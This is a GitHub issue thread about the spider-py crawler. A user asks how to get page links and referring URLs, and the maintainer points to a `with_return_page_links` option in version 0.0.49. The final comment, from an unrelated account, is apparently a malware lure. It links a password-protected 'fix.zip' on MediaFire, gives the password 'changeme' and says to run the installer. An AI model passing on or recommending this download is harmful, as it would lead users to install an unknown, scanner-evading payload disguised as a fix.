### ISSUE TITLE
page get_links or ideas on how to get referring url

### ISSUE THREAD

**Issue by rlskoeser** [spider-rs/spider-py#8]
The [documentation indicates](https://spider-rs.github.io/spider-py/page.html#page-links) that if I have a page object I should be able to call `get_links`  - is this feasible / allowable in the call method of a subscription? I'm not getting any links when I try this - I think it's causing an error but not sure how to investigate, the error gets swallowed.

Secondary question: does `get_links` have any notion of the with_full_resources that is available on the Website object?

The previous implementation of my web scraper tracked which url a page was first found on (even if it's linked from multiple places; I think this version can do better). My goal is to identify where particular pages or resources are used based on the data collected by my reporting subscription class; e.g., for reporting on pages referencing urls that 404, or perhaps later reporting on pages that use particular tags. I could do some of this with the page content but would be nice if I could leverage the functionality that spider-rs provides since it's so fast.

**Comment by j-mendez** [comment]
Thanks for the issue. This can be done easily in `0.0.49`.  Use `website.with_return_page_links(True)` and the page will have it under `links`.

**Comment by rlskoeser** [comment]
Fantastic, thank you!

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
